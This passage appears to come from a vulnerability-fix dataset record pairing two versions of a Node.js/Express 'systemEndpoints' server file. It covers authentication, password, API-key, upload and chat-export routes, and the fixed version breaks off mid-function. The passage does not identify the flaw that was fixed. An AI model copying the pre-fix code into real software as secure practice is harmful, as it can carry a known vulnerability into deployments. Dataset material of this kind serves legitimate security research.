while validating the token: ${error}`,\n });\n }\n\n await Telemetry.sendTelemetry(\n \"login_event\",\n { multiUserMode: true },\n token.user.id\n );\n await EventLogs.logEvent(\n \"login_event\",\n {\n ip: request.ip || \"Unknown IP\",\n username: token.user.username || \"Unknown user\",\n },\n token.user.id\n );\n\n response.status(200).json({\n valid: true,\n user: User.filterFields(token.user),\n token: sessionToken,\n message: null,\n });\n }\n );\n\n app.post(\n \"/system/recover-account\",\n [isMultiUserSetup],\n async (request, response) => {\n try {\n const { username, recoveryCodes } = reqBody(request);\n const { success, resetToken, error } = await recoverAccount(\n username,\n recoveryCodes\n );\n\n if (success) {\n response.status(200).json({ success, resetToken });\n } else {\n response.status(400).json({ success, message: error });\n }\n } catch (error) {\n console.error(\"Error recovering account:\", error);\n response\n .status(500)\n .json({ success: false, message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/reset-password\",\n [isMultiUserSetup],\n async (request, response) => {\n try {\n const { token, newPassword, confirmPassword } = reqBody(request);\n const { success, message, error } = await resetPassword(\n token,\n newPassword,\n confirmPassword\n );\n\n if (success) {\n response.status(200).json({ success, message });\n } else {\n response.status(400).json({ success, error });\n }\n } catch (error) {\n console.error(\"Error resetting password:\", error);\n response.status(500).json({ success: false, message: error.message });\n }\n }\n );\n\n app.get(\n \"/system/system-vectors\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const query = queryParams(request);\n const VectorDb = getVectorDbClass();\n const vectorCount = !!query.slug\n ? await VectorDb.namespaceCount(query.slug)\n : await VectorDb.totalVectors();\n response.status(200).json({ vectorCount });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/remove-document\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { name } = reqBody(request);\n await purgeDocument(name);\n response.sendStatus(200).end();\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/remove-documents\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { names } = reqBody(request);\n for await (const name of names) await purgeDocument(name);\n response.sendStatus(200).end();\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/remove-folder\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { name } = reqBody(request);\n await purgeFolder(name);\n response.sendStatus(200).end();\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\n \"/system/local-files\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (_, response) => {\n try {\n const localFiles = await viewLocalFiles();\n response.status(200).json({ localFiles });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\n \"/system/document-processing-status\",\n [validatedRequest],\n async (_, response) => {\n try {\n const online = await new CollectorApi().online();\n response.sendStatus(online ? 200 : 503);\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\n \"/system/accepted-document-types\",\n [validatedRequest],\n async (_, response) => {\n try {\n const types = await new CollectorApi().acceptedFileTypes();\n if (!types) {\n response.sendStatus(404).end();\n return;\n }\n\n response.status(200).json({ types });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\n \"/system/update-env\",\n [validatedRequest, flexUserRoleValid([ROLES.admin])],\n async (request, response) => {\n try {\n const body = reqBody(request);\n const { newValues, error } = await updateENV(\n body,\n false,\n response?.locals?.user?.id\n );\n response.status(200).json({ newValues, error });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\n \"/system/update-password\",\n [validatedRequest],\n async (request, response) => {\n try {\n // Cannot update password in multi - user mode.\n if (multiUserMode(response)) {\n response.sendStatus(401).end();\n return;\n }\n\n let error = null;\n const { usePassword, newPassword } = reqBody(request);\n if (!usePassword) {\n // Password is being disabled so directly unset everything to bypass validation.\n process.env.AUTH_TOKEN = \"\";\n process.env.JWT_SECRET = \"\";\n } else {\n error = await updateENV(\n {\n AuthToken: newPassword,\n JWTSecret: v4(),\n },\n true\n )?.error;\n }\n response.status(200).json({ success: !error, error });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\n \"/system/enable-multi-user\",\n [validatedRequest],\n async (request, response) => {\n try {\n if (response.locals.multiUserMode) {\n response.status(200).json({\n success: false,\n error: \"Multi-user mode is already enabled.\",\n });\n return;\n }\n\n const { username, password } = reqBody(request);\n const { user, error } = await User.create({\n username,\n password,\n role: ROLES.admin,\n });\n\n if (error || !user) {\n response.status(400).json({\n success: false,\n error: error || \"Failed to enable multi-user mode.\",\n });\n return;\n }\n\n await SystemSettings._updateSettings({\n multi_user_mode: true,\n });\n await BrowserExtensionApiKey.migrateApiKeysToMultiUser(user.id);\n\n await updateENV(\n {\n JWTSecret: process.env.JWT_SECRET || v4(),\n },\n true\n );\n await Telemetry.sendTelemetry(\"enabled_multi_user_mode\", {\n multiUserMode: true,\n });\n await EventLogs.logEvent(\"multi_user_mode_enabled\", {}, user?.id);\n response.status(200).json({ success: !!user, error });\n } catch (e) {\n await User.delete({});\n await SystemSettings._updateSettings({\n multi_user_mode: false,\n });\n\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\"/system/multi-user-mode\", async (_, response) => {\n try {\n const multiUserMode = await SystemSettings.isMultiUserMode();\n response.status(200).json({ multiUserMode });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n });\n\n app.get(\"/system/logo\", async function (request, response) {\n try {\n const darkMode =\n !request?.query?.theme || request?.query?.theme === \"default\";\n const defaultFilename = getDefaultFilename(darkMode);\n const logoPath = await determineLogoFilepath(defaultFilename);\n const { found, buffer, size, mime } = fetchLogo(logoPath);\n\n if (!found) {\n response.sendStatus(204).end();\n return;\n }\n\n const currentLogoFilename = await SystemSettings.currentLogoFilename();\n response.writeHead(200, {\n \"Access-Control-Expose-Headers\":\n \"Content-Disposition,X-Is-Custom-Logo,Content-Type,Content-Length\",\n \"Content-Type\": mime || \"image/png\",\n \"Content-Disposition\": `attachment; filename=${path.basename(\n logoPath\n )}`,\n \"Content-Length\": size,\n \"X-Is-Custom-Logo\":\n currentLogoFilename !== null &&\n currentLogoFilename !== defaultFilename &&\n !isDefaultFilename(currentLogoFilename),\n });\n response.end(Buffer.from(buffer, \"base64\"));\n return;\n } catch (error) {\n console.error(\"Error processing the logo request:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n app.get(\"/system/footer-data\", [validatedRequest], async (_, response) => {\n try {\n const footerData =\n (await SystemSettings.get({ label: \"footer_data\" }))?.value ??\n JSON.stringify([]);\n response.status(200).json({ footerData: footerData });\n } catch (error) {\n console.error(\"Error fetching footer data:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n app.get(\"/system/support-email\", [validatedRequest], async (_, response) => {\n try {\n const supportEmail =\n (\n await SystemSettings.get({\n label: \"support_email\",\n })\n )?.value ?? null;\n response.status(200).json({ supportEmail: supportEmail });\n } catch (error) {\n console.error(\"Error fetching support email:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n // No middleware protection in order to get this on the login page\n app.get(\"/system/custom-app-name\", async (_, response) => {\n try {\n const customAppName =\n (\n await SystemSettings.get({\n label: \"custom_app_name\",\n })\n )?.value ?? null;\n response.status(200).json({ customAppName: customAppName });\n } catch (error) {\n console.error(\"Error fetching custom app name:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n app.get(\n \"/system/pfp/:id\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async function (request, response) {\n try {\n const { id } = request.params;\n if (response.locals?.user?.id !== Number(id))\n return response.sendStatus(204).end();\n\n const pfpPath = await determinePfpFilepath(id);\n if (!pfpPath) return response.sendStatus(204).end();\n\n const { found, buffer, size, mime } = fetchPfp(pfpPath);\n if (!found) return response.sendStatus(204).end();\n\n response.writeHead(200, {\n \"Content-Type\": mime || \"image/png\",\n \"Content-Disposition\": `attachment; filename=${path.basename(pfpPath)}`,\n \"Content-Length\": size,\n });\n response.end(Buffer.from(buffer, \"base64\"));\n return;\n } catch (error) {\n console.error(\"Error processing the logo request:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/upload-pfp\",\n [validatedRequest, flexUserRoleValid([ROLES.all]), handlePfpUpload],\n async function (request, response) {\n try {\n const user = await userFromSession(request, response);\n const uploadedFileName = request.randomFileName;\n if (!uploadedFileName) {\n return response.status(400).json({ message: \"File upload failed.\" });\n }\n\n const userRecord = await User.get({ id: user.id });\n const oldPfpFilename = userRecord.pfpFilename;\n if (oldPfpFilename) {\n const storagePath = path.join(__dirname, \"../storage/assets/pfp\");\n const oldPfpPath = path.join(\n storagePath,\n normalizePath(userRecord.pfpFilename)\n );\n if (!isWithin(path.resolve(storagePath), path.resolve(oldPfpPath)))\n throw new Error(\"Invalid path name\");\n if (fs.existsSync(oldPfpPath)) fs.unlinkSync(oldPfpPath);\n }\n\n const { success, error } = await User.update(user.id, {\n pfpFilename: uploadedFileName,\n });\n\n return response.status(success ? 200 : 500).json({\n message: success\n ? \"Profile picture uploaded successfully.\"\n : error || \"Failed to update with new profile picture.\",\n });\n } catch (error) {\n console.error(\"Error processing the profile picture upload:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.delete(\n \"/system/remove-pfp\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async function (request, response) {\n try {\n const user = await userFromSession(request, response);\n const userRecord = await User.get({ id: user.id });\n const oldPfpFilename = userRecord.pfpFilename;\n\n if (oldPfpFilename) {\n const storagePath = path.join(__dirname, \"../storage/assets/pfp\");\n const oldPfpPath = path.join(\n storagePath,\n normalizePath(oldPfpFilename)\n );\n if (!isWithin(path.resolve(storagePath), path.resolve(oldPfpPath)))\n throw new Error(\"Invalid path name\");\n if (fs.existsSync(oldPfpPath)) fs.unlinkSync(oldPfpPath);\n }\n\n const { success, error } = await User.update(user.id, {\n pfpFilename: null,\n });\n\n return response.status(success ? 200 : 500).json({\n message: success\n ? \"Profile picture removed successfully.\"\n : error || \"Failed to remove profile picture.\",\n });\n } catch (error) {\n console.error(\"Error processing the profile picture removal:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/upload-logo\",\n [\n validatedRequest,\n flexUserRoleValid([ROLES.admin, ROLES.manager]),\n handleAssetUpload,\n ],\n async (request, response) => {\n if (!request?.file || !request?.file.originalname) {\n return response.status(400).json({ message: \"No logo file provided.\" });\n }\n\n if (!validFilename(request.file.originalname)) {\n return response.status(400).json({\n message: \"Invalid file name. Please choose a different file.\",\n });\n }\n\n try {\n const newFilename = await renameLogoFile(request.file.originalname);\n const existingLogoFilename = await SystemSettings.currentLogoFilename();\n await removeCustomLogo(existingLogoFilename);\n\n const { success, error } = await SystemSettings._updateSettings({\n logo_filename: newFilename,\n });\n\n return response.status(success ? 200 : 500).json({\n message: success\n ? \"Logo uploaded successfully.\"\n : error || \"Failed to update with new logo.\",\n });\n } catch (error) {\n console.error(\"Error processing the logo upload:\", error);\n response.status(500).json({ message: \"Error uploading the logo.\" });\n }\n }\n );\n\n app.get(\"/system/is-default-logo\", async (_, response) => {\n try {\n const currentLogoFilename = await SystemSettings.currentLogoFilename();\n const isDefaultLogo = currentLogoFilename === LOGO_FILENAME;\n response.status(200).json({ isDefaultLogo });\n } catch (error) {\n console.error(\"Error processing the logo request:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n app.get(\n \"/system/remove-logo\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (_request, response) => {\n try {\n const currentLogoFilename = await SystemSettings.currentLogoFilename();\n await removeCustomLogo(currentLogoFilename);\n const { success, error } = await SystemSettings._updateSettings({\n logo_filename: LOGO_FILENAME,\n });\n\n return response.status(success ? 200 : 500).json({\n message: success\n ? \"Logo removed successfully.\"\n : error || \"Failed to update with new logo.\",\n });\n } catch (error) {\n console.error(\"Error processing the logo removal:\", error);\n response.status(500).json({ message: \"Error removing the logo.\" });\n }\n }\n );\n\n app.get(\n \"/system/welcome-messages\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async function (_, response) {\n try {\n const welcomeMessages = await WelcomeMessages.getMessages();\n response.status(200).json({ success: true, welcomeMessages });\n } catch (error) {\n console.error(\"Error fetching welcome messages:\", error);\n response\n .status(500)\n .json({ success: false, message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/set-welcome-messages\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { messages = [] } = reqBody(request);\n if (!Array.isArray(messages)) {\n return response.status(400).json({\n success: false,\n message: \"Invalid message format. Expected an array of messages.\",\n });\n }\n\n await WelcomeMessages.saveAll(messages);\n return response.status(200).json({\n success: true,\n message: \"Welcome messages saved successfully.\",\n });\n } catch (error) {\n console.error(\"Error processing the welcome messages:\", error);\n response.status(500).json({\n success: true,\n message: \"Error saving the welcome messages.\",\n });\n }\n }\n );\n\n app.get(\"/system/api-keys\", [validatedRequest], async (_, response) => {\n try {\n if (response.locals.multiUserMode) {\n return response.sendStatus(401).end();\n }\n\n const apiKeys = await ApiKey.where({});\n return response.status(200).json({\n apiKeys,\n error: null,\n });\n } catch (error) {\n console.error(error);\n response.status(500).json({\n apiKey: null,\n error: \"Could not find an API Key.\",\n });\n }\n });\n\n app.post(\n \"/system/generate-api-key\",\n [validatedRequest],\n async (_, response) => {\n try {\n if (response.locals.multiUserMode) {\n return response.sendStatus(401).end();\n }\n\n const { apiKey, error } = await ApiKey.create();\n await Telemetry.sendTelemetry(\"api_key_created\");\n await EventLogs.logEvent(\n \"api_key_created\",\n {},\n response?.locals?.user?.id\n );\n return response.status(200).json({\n apiKey,\n error,\n });\n } catch (error) {\n console.error(error);\n response.status(500).json({\n apiKey: null,\n error: \"Error generating api key.\",\n });\n }\n }\n );\n\n app.delete(\"/system/api-key\", [validatedRequest], async (_, response) => {\n try {\n if (response.locals.multiUserMode) {\n return response.sendStatus(401).end();\n }\n\n await ApiKey.delete();\n await EventLogs.logEvent(\n \"api_key_deleted\",\n { deletedBy: response.locals?.user?.username },\n response?.locals?.user?.id\n );\n return response.status(200).end();\n } catch (error) {\n console.error(error);\n response.status(500).end();\n }\n });\n\n app.post(\n \"/system/custom-models\",\n [validatedRequest],\n async (request, response) => {\n try {\n const { provider, apiKey = null, basePath = null } = reqBody(request);\n const { models, error } = await getCustomModels(\n provider,\n apiKey,\n basePath\n );\n return response.status(200).json({\n models,\n error,\n });\n } catch (error) {\n console.error(error);\n response.status(500).end();\n }\n }\n );\n\n app.post(\n \"/system/event-logs\",\n [validatedRequest, flexUserRoleValid([ROLES.admin])],\n async (request, response) => {\n try {\n const { offset = 0, limit = 10 } = reqBody(request);\n const logs = await EventLogs.whereWithData({}, limit, offset * limit, {\n id: \"desc\",\n });\n const totalLogs = await EventLogs.count();\n const hasPages = totalLogs > (offset + 1) * limit;\n\n response.status(200).json({ logs: logs, hasPages, totalLogs });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/event-logs\",\n [validatedRequest, flexUserRoleValid([ROLES.admin])],\n async (_, response) => {\n try {\n await EventLogs.delete();\n await EventLogs.logEvent(\n \"event_logs_cleared\",\n {},\n response?.locals?.user?.id\n );\n response.json({ success: true });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\n \"/system/workspace-chats\",\n [\n chatHistoryViewable,\n validatedRequest,\n flexUserRoleValid([ROLES.admin, ROLES.manager]),\n ],\n async (request, response) => {\n try {\n const { offset = 0, limit = 20 } = reqBody(request);\n const chats = await WorkspaceChats.whereWithData(\n {},\n limit,\n offset * limit,\n { id: \"desc\" }\n );\n const totalChats = await WorkspaceChats.count();\n const hasPages = totalChats > (offset + 1) * limit;\n\n response.status(200).json({ chats: chats, hasPages, totalChats });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/workspace-chats/:id\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { id } = request.params;\n Number(id) === -1\n ? await WorkspaceChats.delete({}, true)\n : await WorkspaceChats.delete({ id: Number(id) });\n response.json({ success: true, error: null });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\n \"/system/export-chats\",\n [\n chatHistoryViewable,\n validatedRequest,\n flexUserRoleValid([ROLES.manager, ROLES.admin]),\n ],\n async (request, response) => {\n try {\n const { type = \"jsonl\", chatType = \"workspace\" } = request.query;\n const { contentType, data } = await exportChatsAsType(type, chatType);\n await EventLogs.logEvent(\n \"exported_chats\",\n {\n type,\n chatType,\n },\n response.locals.user?.id\n );\n response.setHeader(\"Content-Type\", contentType);\n response.status(200).send(data);\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n // Used for when a user in multi-user updates their own profile\n // from the UI.\n app.post(\"/system/user\", [validatedRequest], async (request, response) => {\n try {\n const sessionUser = await userFromSession(request, response);\n const { username, password } = reqBody(request);\n const id = Number(sessionUser.id);\n\n if (!id) {\n response.status(400).json({ success: false, error: \"Invalid user ID\" });\n return;\n }\n\n const updates = {};\n if (username) {\n updates.username = User.validations.username(String(username));\n }\n if (password) {\n updates.password = String(password);\n }\n\n if (Object.keys(updates).length === 0) {\n response\n .status(400)\n .json({ success: false, error: \"No updates provided\" });\n return;\n }\n\n const { success, error } = await User.update(id, updates);\n response.status(200).json({ success, error });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n });\n\n app.get(\n \"/system/slash-command-presets\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async (request, response) => {\n try {\n const user = await userFromSession(request, response);\n const userPresets = await SlashCommandPresets.getUserPresets(user?.id);\n response.status(200).json({ presets: userPresets });\n } catch (error) {\n console.error(\"Error fetching slash command presets:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/slash-command-presets\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async (request, response) => {\n try {\n const user = await userFromSession(request, response);\n const { command, prompt, description } = reqBody(request);\n const presetData = {\n command: SlashCommandPresets.formatCommand(String(command)),\n prompt: String(prompt),\n description: String(description),\n };\n\n const preset = await SlashCommandPresets.create(user?.id, presetData);\n if (!preset) {\n return response\n .status(500)\n .json({ message: \"Failed to create preset\" });\n }\n response.status(201).json({ preset });\n } catch (error) {\n console.error(\"Error creating slash command preset:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/slash-command-presets/:slashCommandId\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async (request, response) => {\n try {\n const user = await userFromSession(request, response);\n const { slashCommandId } = request.params;\n const { command, prompt, description } = reqBody(request);\n\n // Valid user running owns the preset if user session is valid.\n const ownsPreset = await SlashCommandPresets.get({\n userId: user?.id ?? null,\n id: Number(slashCommandId),\n });\n if (!ownsPreset)\n return response.status(404).json({ message: \"Preset not found\" });\n\n const updates = {\n command: SlashCommandPresets.formatCommand(String(command)),\n prompt: String(prompt),\n description: String(description),\n };\n\n const preset = await SlashCommandPresets.update(\n Number(slashCommandId),\n updates\n );\n if (!preset) return response.sendStatus(422);\n response.status(200).json({ preset: { ...ownsPreset, ...updates } });\n } catch (error) {\n console.error(\"Error updating slash command preset:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.delete(\n \"/system/slash-command-presets/:slashCommandId\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async (request, response) => {\n try {\n const { slashCommandId } = request.params;\n const user = await userFromSession(request, response);\n\n // Valid user running owns the preset if user session is valid.\n const ownsPreset = await SlashCommandPresets.get({\n userId: user?.id ?? null,\n id: Number(slashCommandId),\n });\n if (!ownsPreset)\n return response\n .status(403)\n .json({ message: \"Failed to delete preset\" });\n\n await SlashCommandPresets.delete(Number(slashCommandId));\n response.sendStatus(204);\n } catch (error) {\n console.error(\"Error deleting slash command preset:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n}"}], "fix_func": [{"id": "fix_js_265_1", "commit": "8d302c3f670c582b09d47e96132c248101447a11", "file_path": "server/endpoints/system.js", "start_line": 60, "end_line": 1220, "snippet": "function systemEndpoints(app) {\n if (!app) return;\n\n app.get(\"/ping\", (_, response) => {\n response.status(200).json({ online: true });\n });\n\n app.get(\"/migrate\", async (_, response) => {\n response.sendStatus(200);\n });\n\n app.get(\"/env-dump\", async (_, response) => {\n if (process.env.NODE_ENV !== \"production\")\n return response.sendStatus(200).end();\n dumpENV();\n response.sendStatus(200).end();\n });\n\n app.get(\"/setup-complete\", async (_, response) => {\n try {\n const results = await SystemSettings.currentSettings();\n response.status(200).json({ results });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n });\n\n app.get(\n \"/system/check-token\",\n [validatedRequest],\n async (request, response) => {\n try {\n if (multiUserMode(response)) {\n const user = await userFromSession(request, response);\n if (!user || user.suspended) {\n response.sendStatus(403).end();\n return;\n }\n\n response.sendStatus(200).end();\n return;\n }\n\n response.sendStatus(200).end();\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\"/request-token\", async (request, response) => {\n try {\n const bcrypt = require(\"bcrypt\");\n\n if (await SystemSettings.isMultiUserMode()) {\n const { username, password } = reqBody(request);\n const existingUser = await User._get({ username: String(username) });\n\n if (!existingUser) {\n await EventLogs.logEvent(\n \"failed_login_invalid_username\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[001] Invalid login credentials.\",\n });\n return;\n }\n\n if (!bcrypt.compareSync(String(password), existingUser.password)) {\n await EventLogs.logEvent(\n \"failed_login_invalid_password\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[002] Invalid login credentials.\",\n });\n return;\n }\n\n if (existingUser.suspended) {\n await EventLogs.logEvent(\n \"failed_login_account_suspended\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[004] Account suspended by admin.\",\n });\n return;\n }\n\n await Telemetry.sendTelemetry(\n \"login_event\",\n { multiUserMode: false },\n existingUser?.id\n );\n\n await EventLogs.logEvent(\n \"login_event\",\n {\n ip: request.ip || \"Unknown IP\",\n username: existingUser.username || \"Unknown user\",\n },\n existingUser?.id\n );\n\n // Check if the user has seen the recovery codes\n if (!existingUser.seen_recovery_codes) {\n const plainTextCodes = await generateRecoveryCodes(existingUser.id);\n\n // Return recovery codes to frontend\n response.status(200).json({\n valid: true,\n user: User.filterFields(existingUser),\n token: makeJWT(\n { id: existingUser.id, username: existingUser.username },\n \"30d\"\n ),\n message: null,\n recoveryCodes: plainTextCodes,\n });\n return;\n }\n\n response.status(200).json({\n valid: true,\n user: User.filterFields(existingUser),\n token: makeJWT(\n { id: existingUser.id, username: existingUser.username },\n \"30d\"\n ),\n message: null,\n });\n return;\n } else {\n const { password } = reqBody(request);\n if (\n !bcrypt.compareSync(\n password,\n bcrypt.hashSync(process.env.AUTH_TOKEN, 10)\n )\n ) {\n await EventLogs.logEvent(\"failed_login_invalid_password\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: false,\n });\n response.status(401).json({\n valid: false,\n token: null,\n message: \"[003] Invalid password provided\",\n });\n return;\n }\n\n await Telemetry.sendTelemetry(\"login_event\", { multiUserMode: false });\n await EventLogs.logEvent(\"login_event\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: false,\n });\n response.status(200).json({\n valid: true,\n token: makeJWT(\n { p: new EncryptionManager().encrypt(password) },\n \"30d\"\n ),\n message: null,\n });\n }\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n });\n\n app.get(\n \"/request-token/sso/simple\",\n [simpleSSOEnabled],\n async (request, response) => {\n const { token: tempAuthToken } = request.query;\n const { sessionToken, token, error } =\n await TemporaryAuthToken.validate(tempAuthToken);\n\n if (error) {\n await EventLogs.logEvent(\"failed_login_invalid_temporary_auth_token\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: true,\n });\n return response.status(401).json({\n valid: false,\n token: null,\n message: `[001] An error occurred while validating the token: ${error}`,\n });\n }\n\n await Telemetry.sendTelemetry(\n \"login_event\",\n { multiUserMode: true },\n token.user.id\n );\n await EventLogs.logEvent(\n \"login_event\",\n {\n ip: request.ip || \"Unknown IP\",\n username: token.user.username || \"Unknown user\",\n },\n token.user.id\n );\n\n response.status(200).json({\n valid: true,\n user: User.filterFields(token.user),\n token: sessionToken,\n message: null,\n });\n }\n );\n\n app.post(\n \"/system/recover-account\",\n [isMultiUserSetup],\n async (request, response) => {\n try {\n const { username, recoveryCodes } = reqBody(request);\n const { success, resetToken, error } = await recoverAccount(\n username,\n recoveryCodes\n );\n\n if (success) {\n response.status(200).json({ success, resetToken });\n } else {\n response.status(400).json({ success, message: error });\n }\n } catch (error) {\n console.error(\"Error recovering account:\", error);\n response\n .status(500)\n .json({ success: false, message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/reset-password\",\n [isMultiUserSetup],\n async (request, response) => {\n try {\n const { token, newPassword, confirmPassword } = reqBody(request);\n const { success, message, error } = await resetPassword(\n token,\n newPassword,\n confirmPassword\n );\n\n if (success) {\n response.status(200).json({ success, message });\n } else {\n response.status(400).json({ success, error });\n }\n } catch (error) {\n console.error(\"Error resetting password:\", error);\n response.status(500).json({ success: false, message: error.message });\n }\n }\n );\n\n app.get(\n \"/system/system-vectors\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const query = queryParams(request);\n const VectorDb = getVectorDbClass();\n const vectorCount = !!query.slug\n ? await VectorDb.namespaceCount(query.slug)\n : await VectorDb.totalVectors();\n response.status(200).json({ vectorCount });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/remove-document\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { name } = reqBody(request);\n await purgeDocument(name);\n response.sendStatus(200).end();\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/remove-documents\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { names } = reqBody(request);\n for await (const name of names) await purgeDocument(name);\n response.sendStatus(200).end();\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/remove-folder\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { name } = reqBody(request);\n await purgeFolder(name);\n response.sendStatus(200).end();\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\n \"/system/local-files\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (_, response) => {\n try {\n const localFiles = await viewLocalFiles();\n response.status(200).json({ localFiles });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\n \"/system/document-processing-status\",\n [validatedRequest],\n async (_, response) => {\n try {\n const online = await new CollectorApi().online();\n response.sendStatus(online ? 200 : 503);\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\n \"/system/accepted-document-types\",\n [validatedRequest],\n async (_, response) => {\n try {\n const types = await new CollectorApi().acceptedFileTypes();\n if (!types) {\n response.sendStatus(404).end();\n return;\n }\n\n response.status(200).json({ types });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\n \"/system/update-env\",\n [validatedRequest, flexUserRoleValid([ROLES.admin])],\n async (request, response) => {\n try {\n const body = reqBody(request);\n const { newValues, error } = await updateENV(\n body,\n false,\n response?.locals?.user?.id\n );\n response.status(200).json({ newValues, error });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\n \"/system/update-password\",\n [validatedRequest],\n async (request, response) => {\n try {\n // Cannot update password in multi - user mode.\n if (multiUserMode(response)) {\n response.sendStatus(401).end();\n return;\n }\n\n let error = null;\n const { usePassword, newPassword } = reqBody(request);\n if (!usePassword) {\n // Password is being disabled so directly unset everything to bypass validation.\n process.env.AUTH_TOKEN = \"\";\n process.env.JWT_SECRET = \"\";\n } else {\n error = await updateENV(\n {\n AuthToken: newPassword,\n JWTSecret: v4(),\n },\n true\n )?.error;\n }\n response.status(200).json({ success: !error, error });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\n \"/system/enable-multi-user\",\n [validatedRequest],\n async (request, response) => 